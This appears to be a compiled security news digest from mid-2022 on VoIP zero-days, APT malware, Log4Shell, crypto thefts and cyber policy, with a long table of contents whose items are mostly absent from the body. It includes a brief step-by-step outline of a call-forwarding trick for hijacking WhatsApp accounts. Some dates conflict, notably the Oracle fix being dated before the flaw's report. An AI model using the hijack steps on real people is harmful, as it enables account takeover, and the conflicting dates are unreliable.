Mitel VoIP appliances used in ransomware attack
Table of Contents
- Mitel VoIP appliances used in ransomware attack
- Syniverse (Vodafone supplier) compromised since May 2016
- Call forwarding “trick” allows for Whatsapp account hijack
- Discord as a financial messenger – what could go wrong?
- Metasploit 6.2 released which adds a SIP capture module
- Nessus adds a Cisco IOS-XE destination pattern bypass module
- Mitel phones had a backdoor when booted into special mode
- VitalPBX missing access control vulnerability
- Gallium APT uses new PingPull malware for espionage campaigns
- Oracle Took Six Months to Fix Critical Flaw in Fusion Middleware
- CafePress Fined Over Data Breach and Cover-up
- $100M Stolen from Blockchain Firm Harmony
- Ransomware as a Distraction from IP Theft
- GAO: Private Cyber Insurance, TRIP May Not be Enough to Cover Catastrophic Losses
- CISA: Assume VMware Products Not Patched Against Log4Shell are Compromised
- CISA Asks for Feedback on Trusted Internet Connections 3.0 Cloud Use Case
- Google: Hermit Spyware is Being Used in Italy and Kazakhstan
- ToddyCat APT
- US critical infrastructure needs better cyber insurance coverage
- Harmony mega-hack
- CafePress fine
- Ransomware attacks in Japan
- XCarnival hack
- Abortion hacktivism
- Google Analytics banned in Italy
- Opera launches no-log VPN
- Supreme Court ruling bot activity
- More cash for CISA
- New Air Force cyber chief
- Russia’s IT balkanization continues
- Mitel zero-day
- Malicious Python packages
- Cobalt Strike update
- Social engineering report
- LockBit 3.0
- Snake Keylogger
- API hammering
- Ransomware TTPs
- Agent Saitama
- Vulnerabilities get patched slower and slower
- Miracle exploit
- Codesys bugs
- Zena RCE
- The NYTimes Analyzes China’s Surveillance State Plans
- BEC Attackers Starting to Impersonate Third-party Vendors
- Attacker Selling Access to Networks via Atlassian Vuln
- Chinese Attackers Using Ransomware to Hide Espionage
- 2 New Cybersecurity Bills Signed Into Law
- CISA’s Cloud Security Technical Reference Architecture
- Automatic CAPTCHA With iOS
- U.S. abortion ruling reversal sparks calls for privacy laws
- Russian hackers targeting U.S. and other Ukraine allies
- Twitter apologizes for abusing user security information after $150M FTC settlement
- Google warns Hermit spyware is targeting iOS and Android users
- Mega says it can’t decrypt your files, a new exploit shows otherwise
- Researcher hacks into backend for network of smart Jacuzzis
- Strava app flaw revealed runs of Israeli officials at secret bases
- Are you a bot? Not with a PAT
- Delivery firm Yodel quiet over cyberattack
- $100M looted after crypto weak-link exploited
- US DoE’s National Cyber-Informed Engineering Strategy
- US, UK, New Zealand: Make Sure PowerShell is Securely Configured
- Multiple Vulnerabilities in Operational Technology Devices
- Malware Infects Networks at Two Texas Hospitals
- Cloudflare Outage Due to Network Configuration Issue
- CISA Publishes Revised Version of Cloud Security Technical Reference Architecture
- New US Cybersecurity Laws
- Cyberattack May Have Set Off Israeli Air Raid Sirens
- CISA Warns of Hillrom Medical Device Vulnerabilities
- Bill Would Require Regular Medical Device Security Requirement Updates from FDA
- Guilty Verdict in 2019 Capital One Breach
- WordPress Ninja Forms Vulnerability Fixed
- Flagstar Bank Discloses Data Breach
- Proposed Legislation in US Senate Would Ban Sale of Health and Location Data
- International Effort Disrupts Russian Botnet
- Rapid7 Report: Types of Data Most Often Targeted by Ransomware Operators
- BRATA Malware Gains New Features
- Vulnerability in Cisco Small Business Routers
- Siemens Fixes Flaws in SINEC Network Management System
- Google TAG says it tracks 30 surveillance vendors
- Carnival Cruise settlement
- CS:GO skin heist
- New Instagram feature
- Chrome 103 is out
- 7-Zip now supports MotW
- NSA and allies on PowerShell
- CISA wants a cybersecurity hotline
- Long CISA onboarding
- US spy agencies prepared to loosen hiring rules
- US bill on privacy and data transfers
- Lithuania DDoS alert
- Conti infrastructure goes down
- Vulnerabilities used by ransomware gangs
- Search Marquis
- VMWare warning
- Scalping bots hit Israeli government sites
- RSocks gang
- Conti report
- Chinese APT
- Russia’s cyber operations
- Ukraine DDoS protection
- FLOSS v2.0
- Millions Of Secrets Exposed Via Web Application Frontend
- US TikTok User Data Has Been Repeatedly Accessed From China, Leaked Audio Shows
- What It Means that the U.S. Is Conducting Offensive Cyber Operations Against Russia
- Cisco patches critical, high-severity vulnerabilities in Email Security Appliance, home routers
- Top websites have sucky password policies
- BeanVPN leak
- StoreHub leak
- Rust Foundation grants
- Problematic bill
- Instagram sabotage
- Privacy legislation
- Alexa data used for ads
- Google fined in Russia
- RSocks seized
- Call center and BEC arrests
- Netherlands arrest
- icloudripper4you sentenced
- Russian hacker arrested
- Telerik attacks
- Houdini returns
- Initial access prices
- Redline Stealer
- Indian police framed reporters
- Legal threats
- Demonic vulnerability
- Ninja Forms vulnerability
- SharePoint and OneDrive ransomware
- More Hertzbleed
- RDP vulnerability finally patched
- Patch Tuesday is not ending
- GitHub updates
- BlackHat Arsenal
- Follina tooling
- Big Phish
- Ransomware is Underreported
- Good News, More BEC!
- Firefox upping privacy
- Splunk Releases Critical Update
- Microsoft Patch Tuesday Updates Include Follina Fix
- Microsoft Called Out for Dragging its Feet on Azure Fixes
- US HHS Security Risk Assessment Tool Version 3.3
- Healthcare Entities Respond to HHS RFI on Cybersecurity Requirements
- Cloudflare Says it Mitigated a 26M rps DDoS Attack
- Hertzbleed Side-Channel Attack
- Citrix Fixes ADM Vulnerabilities
- Latin American Government Face Serious Ransomware Risks
- Ukraine’s Internet Routed Through Russia
- SBOMs Need to be Mapped to Known Vulnerabilities
- Cloud Security Alliance: Top Cloud Computing Risks
- Prison Time for Selling DDoS Attack Services
- 40 high-severity vulnerabilities included in June’s Patch Tuesday
- Symbiote malware can remain undetected on Linux machines
- Microsoft accused of concealing Azure vulnerabilities
- New Aadhaar leak
- Firefox Total Cookie Protection
- Thunderbird comes to Android
- IE retirement
- Chrome’s Rust migration
- GhostDNS attacks
- DownThem & AmpNode
- Another record-breaking DDoS attack
- NFT scamming
- Gallium APT
- Iranian operation
- Follina patches
- Other Patch Tuesday fixes
- Hertzbleed attack
- SynLapse details
- Zombie zero-days
- GhostWriter news
- Microsoft buys Miburo
- Vulnerability: Credential leak in Travis CI log API
- Article: Microsoft’s recommendations for mitigating against API threats
- Travis CI API Exposes User Tokens
- PACMAN Hardware Attack Defeats Apple M1 Pointer Authentication
- Kaiser Permanente Breach Affects 70,000 Patients
- The World Economic Forum’s Atlas Initiative Aims to Map Cybercrime Ecosystem
- Ransomware Attacks Targeting Costa Rica are Among First Targeting a Country’s Government
- Envoy Proxy DoS Vulnerability
- Google Fixes Seven Vulnerabilities in Chrome for Desktop
- Gallium Hacking Group’s New Remote Access Trojan is Hard to Detect
- Travel Companies Forced to Share Data
- Goodbye, IE (Mostly)
- Google shuts down YouTube Russian propaganda channels
- Optimism hack happy ending
- German energy suppliers
- Cloud middleware
- Firefox reducing sandbox escape attack surface
- Confluence exploitation
- SeaFlower group
- ASyncRAT stats
- Finland arrest
- Nigerian bank robbers
- Adconion execs plead guilty
- Few NetWalker victims complained
- HelloXD ransomware
- Android malware
- Lyceum APT
- PACMAN attack
- K8s vulnerability
- Trendnet vulnerabilities
- Drupal bugs
- Backdoor account in thermal cameras
- Backdoor in Mitel VoIP phones
- U.S. ordered travel companies to spy on Russian hacker for years
- U.S. warns Chinese hackers are targeting ISPs and telecoms
- RSA 2022: Cloud providers still using secret middleware
- Inside ID.me’s torrid pandemic growth spurt: ill-equipped staff and data-security lapses
- How a saxophonist tricked the KGB by encrypting secrets in music
- How to open a locked Sentry Safe in seconds
- New Tesla hack gives thieves their own personal key
- OneTrust has ‘record’ quarters, still lays off 25% staff
- Feds shutter marketplace selling SSNs
- Microsoft mum on Follina exploit
- US Government Agencies with Legacy Systems Face Struggle to Implement MFA
- Android Updates for June 2022
- Facebook Phishing Campaign
- New Microsoft Defender Feature Isolates Unmanaged Devices
- Sophos Says Dwell Time Increased in 2021
- Follina is Being Actively Exploited to Spread Malware
- Joint Advisory: China Exploits Known Vulnerabilities to Target Telecoms
- CISA’s Cyber Innovations Fellows Initiative
- CISA Adds 39 Flaws to Known Exploited Vulnerabilities Catalog
- Public exploit code worsens Atlassian Confluence vulnerability scenario
- ChinaChopper web shell pops up again on backs of Atlassian bugs
- Evil Corp’s Sanctions Evasion Attempts Fall Flat
- Internet Anonymity Targeted in Authoritarian States and Democracies Alike
- iOS Safety Check
- PII market seized
- Children’s hospital attack thwarted
- Schulte is Still Unpleasant
- Chinese APT “Plumbing” Laid Bare
- Cyber Command Did Something. We Have No Idea What.
- Confluence exploitation
- Follina gets some love
- LockBit-Mandiant drama, explained
- Maiar hack
- Schulte profile
- iOS gets separate security update mechanism
- iOS to protect victims of domestic abuse
- Binance exposed
- XLoader pauses Ukraine infections
- Arrest in Vietnam
- Passwordstate digital certificate
- Skimmer detained in Ukraine
- CyberSpecial Forces
- SSNDOB seized
- Ruso-Ukrainian war
- Micropatch for another Microsoft zero-day
- Telegram denies vulnerability report
- Android security patches
- IBM acquires Randori
- Follina Vulnerability Remains Unpatched
- Follina is Being Actively Exploited
- Audit Raises Questions About Federal Dam Cybersecurity Accountability
- Windows Autopatch Now in Preview
- Atlassian Releases Patches for Critical Confluence Server and Data Center Vulnerability
- US Draft Legislation Would Create National Data Privacy and Security Framework
- New York’s Right to Repair Bill for Electronics
- Security Flaws in BD Synapsis, BD Pyxis, and Illumina Medical Devices
- Palermo, Italy Suffers Cyberattack
- GADOLINIUM (APT40)
- Google GCP VRP
- U-boot vulnerabilities
- CodeSec is now free
- Microsoft disrupts Bohrium APT infrastructure
- Ukrainian TV station hack
- The apes are gone, again
- Google privacy settlement
- Telegram privacy accusations
- WhatsApp threatens to leave the Netherlands
- Microsoft Edge network service sandbox
- New Firefox privacy feature
- 1Password joins FIDO
- Russia gets tough on privacy
- Australia’s new cyber minister
- Pysa research
- Windows RDP brute-forcing
- Solver services
- Banks in Singapore Must Take Steps to Protect Customers from Online Fraud
- Atlassian Warns of Confluence Server Vulnerability
- FBI Blocked Cyberattack Against Boston Children’s Hospital
- VPN Company Will Move Servers Out of India
- FluBot Takedown
- Foxconn Plant Hit with Ransomware
- US Dept. of Justice Seizes Domain Names Used for Cybercrime
- Nakasone: US Conducted Offensive Cyber Ops
- CISA Says Dominion Voting Machine Flaws Were Not Exploited
- Apple App Store stats
- Microsoft Autopatch
- Firefox 101
- Some Mozilla VPN code goes FOSS
- ExpressVPN pulls out of India
- Voice privacy nightmare
- FluBot takedown
- DOJ seizures
- Operation KillerBee
- Elasticsearch ransom attacks
- Malicious npm package
- EvilCorp evading sanctions
- Faking malicious traffic
- YourCyanide ransomware
- Conti goes after Intel firmware
- Popping Eagle
- Chinese APTs and cybercrime
- Backdoor stays in
- Confluence zero-day
- New MSFT zero-day, same core problem
- OpenSSL vulnerability
- UNISOC bugs
- Unpatched Horde webmail bug
- Digital Shadows
- Tool release
- Amnesty fellowship
- FBI thwarts Iranian attack
- Cloud Security
- Container Security
- Blue Team
- Supply Chain
- Running Bug Bounty Programs
- Network Security
- Web Security
- “Follina” exploit in Microsoft Office gives attackers potential backdoor to code execution
- Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
- Vulnerability: OAS platform vulnerable to critical RCE and API access flaw
- Vulnerability: Mass account takeover in Yunmai smart scale API
- Clop Ramps Up
- Universities Put On Watch
- Arrested REvil Members Will Skate
- SpiceJet Grounded
- 60 million wins
- SilverTerrier Head Arrested
- A Minister for Cyber Security!
- Chinese Open Source is Not that Open
- Russia orders Google to remove Tor Browser from Russian Play Store
- Mirror Protocol hack #1
- Mirror Protocol hack #2
- Portland falls to BEC
- AON incident
- 365 Data Centers lawsuit
- Chinese FOSS censorship
- Microsoft Entra
- PSP protocol
- Ukrainian BGP hijack
- New HelloXD ransomware
- Android malware ecosystem
- Operation KillerBee
- FBI alert
- WSO2 exploitation
- Amadey Loader
- Mars Stealer
- Office zero-day mitigation
- Microsoft Office Zero-Day Vulnerability
- GitHub Details npm Account Information Stolen in April
- Microsoft Rolling Out Security Defaults
- Commerce Publishes Final Rule on Cybersecurity Tools Export Controls
- FBI Warns Criminals are Selling University Credentials
- Talos List of Open Automation Software Vulnerabilities
- Italy’s CSIRT Warns of Potential DDoS Attacks
- More Pushback Against CERT-In Breach Reporting Requirements
Mitel have not been very lucky lately with the security news. The latest involves abuse of a zero-day exploit – CVE-2022-29499 – in a ransomware attack as detailed by Crowdstrike. Essentially, the vulnerable VoIP applications are MiVoice Connect appliances (SA 100, SA 400 and Virtual SA). The blog post by Crowdstrike does a very good job detailing the results of their forensics investigation and indicates that the vulnerable MiVoice Connect appliance in question was used as the entry-point into an organisation’s network.
The vulnerabilities exploited in the Mitel appliance were related to the web interface and problematic PHP application code.
Read more in
- The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance
- CISA Warns of Active Exploitation of ‘PwnKit’ Linux Vulnerability in the Wild
- Mitel VoIP Bug Exploited in Ransomware Attacks
- Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack
Syniverse (Vodafone supplier) compromised since May 2016
This one seems like a big deal considering the sort of access that is required to provide services provided by the allegedly compromised company, Syniverse. They are essentially a CPaaS, providing connectivity to mobile operators globally.
Read more in
Call forwarding “trick” allows for Whatsapp account hijack
This article is about a trick posted by Rahul Sasi (of CloudSEK) which can be used to hijack Whatsapp accounts. Summarized, it goes like this:
- Adversary social engineers victim into calling the MMI codes to forward all calls to a phone number controlled by adversary
- Adversary starts Whatsapp registration process to register as victim’s phone number
- Adversary chooses voice as verification method (instead of SMS)
- Adversary hijacks victim’s Whatsapp account
This is one of those few times where security people are highlighting the problems of voice calls for authentication, instead of SMS OTP (see the Syniverse coverage). Also, this seems to be a very old-school attack that is being applied to Whatsapp authentication. But really, being able to cause all calls to be forwarded to a different number introduces many other problems for the victims. MMI codes are relatively obscure to most people these days, yet still there.
It got me thinking, would anyone miss them if they were gone?
Read more in
Discord as a financial messenger – what could go wrong?
Vice published an interesting article which talks about privacy issues within Discord and how its threat model focuses on gamers and certainly not crypto-trading and crypto related projects. However, it seems that the crypto people have a soft spot for Discord and are making the wrong assumptions as to its security and privacy features.
One of the main claims that the Discord API appears to leak the name, description, members list and activity data of every private channel on every server. The article mentions a number of other issues and caveats and is worth a read if you’re interested in large platforms of the sort.
Read more in
Metasploit 6.2 released which adds a SIP capture module
In the Metasploit 6.2 announcement, there was mention of a new capture plugin that has support to capture SIP authentication. The same plugin captures many other protocols too, most typically NTLM, and SMTP, Telnet, FTP, and so on.
Here’s the description of the module:
This module provides a fake SIP service that is designed to capture authentication credentials. It captures challenge and response pairs that can be supplied to Cain or JtR for cracking.
Read more in
Nessus adds a Cisco IOS-XE destination pattern bypass module
The vulnerability scanner, Nessus has a new module that detects a Cisco IOS vulnerability that leads to toll fraud when abused. Description of the module:
A vulnerability in the Voice Telephony Service Provider (VTSP) service of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to bypass configured destination patterns and dial arbitrary numbers.
This vulnerability is due to insufficient validation of dial strings at Foreign Exchange Office (FXO) interfaces. An attacker could exploit this vulnerability by sending a malformed dial string to an affected device via either the ISDN protocol or SIP. A successful exploit could allow the attacker to conduct toll fraud, resulting in unexpected financial impact to affected customers.
The check from Nessus relies on detecting the version of the Cisco IOS-XE so it does not seem to be actually demonstrating the vulnerability. The patch has been available since September 2021.
Read more in
- Cisco IOS XE Software FXO Interface Destination Pattern Bypass (cisco-sa-fxo-pattern-bypass-jUXgygYv)
- Cisco IOS and IOS XE Software FXO Interface Destination Pattern Bypass Vulnerability
Mitel phones had a backdoor when booted into special mode
Researchers from the security firm Syss have reported vulnerabilities in Mitel phones (6900 Series) that allow attackers with physical access to gain root access to the phone. This is related to the phone starting a telnet backdoor when booting up while pressing the * and # keys on the phone. It is tracked as two CVEs:
Read more in
- Mitel Product Security Advisory 22-0004: Mitel 6800 Series SIP Phone and 6900 Series SIP Phone Access Control Vulnerability
- Mitel Product Security Advisory 22-0003: Mitel 6900 Series IP Phone Access Control Vulnerability
VitalPBX missing access control vulnerability
This one is tracked as CVE-2022-29330 with the following description:
Missing access control in the backup system of Telesoft VitalPBX before 3.2.1 allows attackers to access the PJSIP and SIP extension credentials, cryptographic keys and voicemails files via unspecified vectors.
Blog post by Corinne Henin & Thibaut Henin of Arsouyes about the vulnerability: CVE-2022-29330 – vulnerability in VitalPBX < 3.2.1
Gallium APT uses new PingPull malware for espionage campaigns
A China-based APT called “Gallium” is using a new trojan to target companies operating in Southeast Asia, Europe and Africa. Called “PingPull,” the backdoor uses ICMP for C2 communications and has never been seen before in the wild. PingPull is a Visual C++-based malware that provides actors with the ability to access a reverse shell and run arbitrary commands on a compromised host. The actor could then move files, enumerate storage devices and timestomp files. Gallium traditionally targets telecommunications, finance and government organizations.
Read more in
Oracle Took Six Months to Fix Critical Flaw in Fusion Middleware
Researchers say that six months elapsed between the time they notified Oracle of a critical vulnerability in Fusion Middleware and the day Oracle released a fix for the issue. The deserialization of untrusted data vulnerability can be exploited remotely without authentication to allow arbitrary code execution. The researchers notified Oracle of the flaw in October 2021; Oracle fixed the issue in its April 2021 Critical Patch Update.
- Deserialization issues are all too common in middleware, and can be difficult to patch right. The usual fix employed by Oracle in the past is to establish blocklists to not allow the instantiation of very specific, deemed to be dangerous, objects. But these blocklists have been bypassed in the past if they were not defined well. A huge ecosystem of applications relies on this middleware and Oracle does need to pay attention to minimize the possibilities of breaking these applications.
- As we’ve seen with Microsoft and many other vendors of large complex software, some software flaws can take several months to fix and test. But, Oracle has been silent on why this one took so long or in providing any guidance to customers in shielding or workaround actions to take while awaiting a real fix.
- One exploit involves chaining two vulnerabilities, CVE-2022-21445 (deserialization of untrusted data) and CVE-2022-21497 (SSRF), to achieve pre-authentication RCE. The time to release a patch was likely due to interdependency and regression testing and resolution. You should have already deployed the April CPU. If not, the publishing of the exploit details should be seen as a call to act.
- Having been on the inside of some of these decisions, one can testify that the vendors are often between a rock and a hard place, in a dilemma that cannot be recognized or appreciated from the outside. Moreover, the vendor may be aware of many vulnerabilities more severe than those reported from the outside and is fixing them in the most efficient order. One is inclined to cut the vendor some slack. That said, six months with no explanation or guidance to customers is a little much. One starts to question the vendors priorities.
Read more in
- Miracle – One Vulnerability To Rule Them All
- Researchers: Oracle Took 6 Months to Patch ‘Mega’ Vulnerability Affecting Many Systems
- Researchers criticize Oracle’s vulnerability disclosure process
CafePress Fined Over Data Breach and Cover-up
The US Federal Trade Commission (FTC) has finalized an order against CafePress over a 2019 breach that compromised data for nearly 23 million accounts. CafePress kept data longer that it needed to; stored sensitive information, like Social Security numbers (SSNs), in plaintext; did not secure its systems sufficiently; and covered up the breach, electing not to inform impacted customers. The complaint was filed against former CafePress parent company Residual Pumpkin, LLC, and current CafePress owner PlanetArt, LLC. The final order requires both companies to implement comprehensive cybersecurity programs, employ multi-factor authentication, store data for only the minimum amount of time necessary, and encrypt SSNs.
- This is a good report to use to convince management of the importance of cybersecurity review being part of Merger and Acquisition decisions. Planet Art acquired Café Press after the 2019 and may have adjusted the amount they paid downward. However, 3 years later Planet Art will be subject to the FTC action on their security program, even if the original parent company (Residual Pumpkin) has to pay the fine.
- It’s not a bad idea to review where you’re storing PII and make sure you’re aligned with the relevant privacy laws, (CCPA, GDPR, etc.) to include retention and appropriate use restrictions. Be sure to check online services used, such as event registration services, for data collected and stored to ensure they also meet protection requirements. Leverage your legal team to understand how these laws apply to your business. Build awareness training for both developers and users as well as creating any needed supporting KB articles and/or policies.n
Read more in
- FTC Finalizes Action Against CafePress for Covering Up Data Breach, Lax Security
- FTC Takes Action Against CafePress Over Massive Data Breach, Cover-Up
- CafePress Fined $500,000 After Massive Data Breach
$100M Stolen from Blockchain Firm Harmony
Thieves have stolen more than $100M in cryptocurrency from blockchain company Harmony. Harmony provides bridge services for users who want to transfer cryptocurrency across different blockchains. The company’s Horizon Ethereum Bridge was compromised last week. Harmony is offering a $1M bounty for the return of the stolen funds.
- Of course, that $100M was only worth $30M a few days later… Hard to get real data on “cryptocurrency” use but it seems clear more of it is stolen each year than is used for actual business transactions.
- Harmony transfers cryptocurrencies, stablecoins and non-fungible tokens between their blockchain and other networks. The Ethereum tokens were what was stolen. The attackers used 11 transactions which extracted the ETH tokens on the bridge. Moreover, these were doubly encrypted via passphrase and key management service. The pilfered keys were able to satisfy the multi-signature contract allowing the funds to be transferred. The point is you need to understand how your crypto is protected, how exchanges are authorized and what recourse you have if compromised.
Read more in
- Horizon Offers $1M Bounty to Hackers Who Stole $100M
- Hackers stole $100 million in latest crypto theft
- More than $100m in cryptocurrency stolen from blockchain biz
Ransomware as a Distraction from IP Theft
Researchers from Secureworks say that Chinese state-sponsored threat actors may be using ransomware as a distraction while they plumb organizations’ networks for intellectual property and other sensitive data. Secureworks has provided a list of threat indicators to help detect malicious activity related to the threat actors.
- Same is often true of denial of service attacks that are often used as distractions from the main tactics, or are used simply to flood SIEM consoles with alerts that will slow the security team from handling the critical alerts.
- View this as a twist to current ransomware + extortion techniques. The ransomware is used to obfuscate evidence, distract investigators and otherwise cover the indications relating to exfiltration of data. The attackers are using the HUI loader, which is a custom DLL loaded by legitimate programs subject to DLL search order hijacking. The loader then installs a RAT such as Cobalt Strike, PlugX, SodaMaster and QuasarRAT. The attack leverages weaknesses in your boundary control devices, taking us back to making sure they are patched, the configuration is verified as secure, and you’re using MFA for remote access. Leverage the IOCs in the Secureworks article.
Read more in
- BRONZE STARLIGHT Ransomware Operations Use HUI Loader
- Chinese hackers use ransomware as decoy for cyber espionage
- Chinese APT Group Likely Using Ransomware Attacks as Cover for IP Theft
- These hackers are spreading ransomware as a distraction – to hide their cyber spying
GAO: Private Cyber Insurance, TRIP May Not be Enough to Cover Catastrophic Losses
The US Government Accountability Office (GAO) is concerned that currently available private cyber event insurance and the government’s Terrorism Risk Insurance Program (TRIP) may not be sufficient to cover catastrophic financial losses due to cyberattacks. GAO recommends that “CISA and the Department of the Treasury’s Federal Insurance Office (FIO) should jointly assess the extent to which risks to critical infrastructure from catastrophic cyber incidents and potential financial exposures warrant a federal insurance response, and inform Congress of the results of their assessment.”
- The key line in this 53 page report is “One option that has been proposed is to tie federal assistance for cyber-related losses to cybersecurity requirements.” Insurance can’t cover catastrophic losses that are due to lack of basic security hygiene. Like any form of insurance, to be useful to businesses, or for the government to step in when state-sponsored or terrorist-initiated attacks cause broad damage, cyberinsurance policies have to be based on proof of maintaining baseline standards. In this case, the government will likely point to the NIST framework.
- Insurance companies have been revising language and criteria in response to trends in ransomware claims. Review your cyber insurance to understand what it covers and what are the triggers. For example, the GAO believes that incidents may not meet the criteria needed to be categorized as terrorism, resulting in a non-payment. Determine if there are new criteria, such as vulnerability assessments or MFA you are also now required to meet for your insurance to be valid, don’t delay closing any gaps here.
Read more in
- Cyber Insurance: Action Needed to Assess Potential Federal Response to Catastrophic Attacks
- US watchdog is worried cyber insurance won’t cover ‘catastrophic cyberattacks’
- GAO: Potential Federal Cyber Insurance Program Should Avoid Moral Hazard
CISA: Assume VMware Products Not Patched Against Log4Shell are Compromised
In a joint cybersecurity advisory, the US Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) warn that threat actors are continuing to exploit Log4Shell in VMware Horizon® and Unified Access Gateway (UAG) servers. CISA and CGCYBER urge organizations with vulnerable systems to assume compromise and begin threat hunting action using the indicators of compromise included with the advisory.
- VMware released fixes for Log4J back in December. If you have any systems which are still not updated, you’re going to want to forensicate them fully before trusting them. Make sure that you’re minimizing the services exposed to the Internet, that accounts are audited, removing which are unused or no-longer-needed. Lastly, strong authentication is pretty important, don’t overlook it, keep an eye on excepted users, find a way to not have any exceptions.
- Post SolarWinds, assuming persistent but covert compromise, might well be the appropriate default. In the face of such compromise, the efficient defensive strategy is strong process-to-process isolation. The goal should be so-called “zero trust.”
Read more in
- Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
- Attackers Use Log4Shell to Hack Unpatched VMware Products
- CISA: Hackers are still using Log4Shell to breach networks, so patch your systems
- CISA: Log4Shell exploits still being used to hack VMware servers
- APT Groups Swarming on VMware Servers with Log4Shell
CISA Asks for Feedback on Trusted Internet Connections 3.0 Cloud Use Case
The US Cybersecurity and Infrastructure Security Agency (CISA) is seeking feedback and comments on its Trusted Internet Connections (TIC) 3.0 Cloud Use Case. This rounds out the series of TIC use cases: CISA released the Traditional TIC Use Case, Branch Office Use Case, and Remote User Use Case last year. “The goal of TIC 3.0 is to secure federal data, networks, and boundaries while providing visibility into agency traffic, including cloud communications.” CISA is accepting public comment on the TIC 3.0 Cloud Use Case through July 22, 2022.
- TIC is a mixed bag. In some scenarios such as HPC, a non-starter for effective connectivity across the internet. The goal is to achieve a version of TIC which is aligned with Zero-Trust and a cloud based service architecture. Take a hard look at the draft and provide feedback to ensure the end model is usable.
Read more in
- Serving Up “As-a-Service”: TIC Releases Draft Use Cases Covering Cloud Services
- Trusted Internet Connections 3.0 | Cloud Use Case (PDF)
- TRUSTED INTERNET CONNECTIONS GUIDANCE REPOSITORY
- CISA Seeks Public Feedback on TIC 3.0 Cloud Use Case
Google: Hermit Spyware is Being Used in Italy and Kazakhstan
Google says that spyware from Italian company RCS Labs is being used to target people in Italy and Kazakhstan. The spyware, known as Hermit, targets both iOS and Android devices, and uses drive-by downloads to gain initial footholds on targeted devices. Hermit can steal data from infected phones and can also make and record calls.
- The malicious applications masquerade as account recovery applications. Consider carefully requests to install applications to support actions like this, verify, out-of-band that they are indeed part of the process. Make sure that your users understand the recovery processes for accounts associated with applications they use. Make sure that users only install applications from trusted app stores, including what to do when they are requested to install one from another source.
Read more in
- Spyware vendor targets users in Italy and Kazakhstan
- Google Warns Spyware Being Deployed Against Android, iOS Users
Researchers at Kaspersky have discovered an advanced persistent threat (APT) actor that is exploiting the ProxyLogon vulnerability in targeted attacks against government and military organizations in Europe and Asia. Dubbed ToddyCat, the threat actor does not appear to have ties to other known threat actors. ToddyCat uses two tools, also not seen before, that Kaspersky is calling ”Samurai backdoor” and “Ninjas Trojan.” The tools are being used to exploit two backdoors in the Exchange Server environment. Targeting Exchange Servers.
- The China Chopper web shell is installed, which allows for svchost to load the malicious “iiswmi.dll” which then uses a .Net loader to execute the Samurai backdoor; which is hard to detect. The SecureList blog post includes IOCs for you to incorporate into your processes to discover this activity. Make sure your Exchange infrastructure is up to date. Given the low-profile of this attack group, proactively scanning for the IOCs is a good idea.
Read more in
US critical infrastructure needs better cyber insurance coverage
A report published last week by the US Government Accountability Office (GAO) has found that critical infrastructure organizations may not receive full cyber insurance coverage, especially if incidents result in “catastrophic financial losses.”
GAO looked at cyber insurance provided by both the US private sector and the US government itself—through its Terrorism Risk Insurance Program (TRIP).
Officials said that while, in general, the cyber insurance sector provides good coverage for incidents like data breaches and ransomware attacks against most companies, critical infrastructure entities are in a sensitive spot.
First, the US government’s TRIP coverage may not kick in unless a cybersecurity incident is formally linked to an act of “terrorism,” which most likely is not going to happen since cyber-related outages must be violent or coercive in nature, to be certified as “acts of terrorism.”
Second, GAO notes that private cyber insurance providers may be able to weasel their way out of covering a particularly damaging (and expensive) attack if the incident is formally linked to an act of war, such as the acts of a state-backed threat actor.
The findings of the GAO report aren’t particularly “new” and, at this point, are common knowledge for most cybersecurity experts today. However, the report is an important step in the sometimes overly complex procedure of the US government.
In the report’s conclusion, GAO officials recommended that both Treasury and DHS officials update the US government’s response to incidents impacting critical infrastructure. This revamped response should provide better support for cybersecurity-related events and their typical fallout, such as expanding the government’s insurance coverage beyond just acts of “classic” terrorism.
Cryptocurrency bridge project Harmony said it was hacked for more than $100 million worth of cryptocurrency. The hack took place on Thursday and targeted the Harmony Protocol, a system used to interchange cryptocurrencies between different blockchains. The company is currently keeping an incident response blog post on Medium.
The US FTC fined last week the CafePress t-shirt merchandise site $500,000 for trying to cover up the severity of its 2020 data breach. The FTC said CafePress had weak security measures in place, which eventually allowed a threat actor to break in and steal the personal data of 23 million customers.
Ransomware attacks in Japan
XCarnival, a company that claims to be the first NFT assets management platform for the Metaverse, was hacked on Saturday by an unidentified threat actor who exploited its smart contracts to steal 3,087 ETH, estimated at roughly $3.8 million at the time of the heist. The company confirmed the incident in a statement on Twitter when it also paused its smart contracts. Additional details are available in this Twitter thread from blockchain security firm PeckShield, which was the one to stop the suspicious transactions:
In the aftermath of the US Supreme Court’s overturning of the Roe v Wade abortion protections, a hacktivist group known as SiegedSec has leaked data claiming to be from government employees from states that support or have already enacted abortion bans. According to early reports of users who sifted through the data, the leaked files appear to contain info from Arkansas and Kentucky, although it’s unclear if it’s newly obtained information or just recycled old leaks.
Google Analytics banned in Italy
Opera launches no-log VPN
Following in Mozilla’s footsteps, Opera Software has launched a VPN service for its users. Opera says the new VPN Pro service is complementary to its Free VPN offering, which the company has been providing to its browser users for half a decade. However, unlike its Free VPN service, which works more like a proxy, Opera says this new service is actually a “no-log” VPN with “3000+ private network servers in over 30 locations around the world.” Furthermore, VPN Pro will also be provided as a separate app and provide device-wide VPN connections and not only for the Opera browser’s traffic.
Supreme Court ruling bot activity
The US Supreme Court’s controversial ruling that rolled back Woe-vs-Wade abortion rights protections for US women has spurred a spike in bot and inauthentic activity on Twitter. According to Christopher Bouzy of BotSentinel, inauthentic accounts are trying to convince people angry about the decision not to vote in the upcoming US midterm elections.
More cash for CISA
US officials voted on Friday in favor of a $2.9 billion budget for the Cybersecurity and Infrastructure Security Agency (CISA). The amount allocated for CISA is $417 million more than the Biden administration requested for the DHS cyber wing, The Record reported.
New Air Force cyber chief
The Senate on Thursday confirmed Air Force Maj. Gen. Kevin Kennedy, the current US Cyber Command director of operations, as the new head of the US Air Force’s information warfare branch, the 16th Air Force (Air Forces Cyber).
Russia’s IT balkanization continues
Russian government agencies are ditching foreign video conferencing software, such as Zoom, Webex, and WhatsApp, in favor of Russian-made video conferencing tools from VK and TrueConf, Kommersant reported last week. The move comes after Russian government agencies also abandoned foreign IM apps earlier this month as well, also in favor of local alternatives.
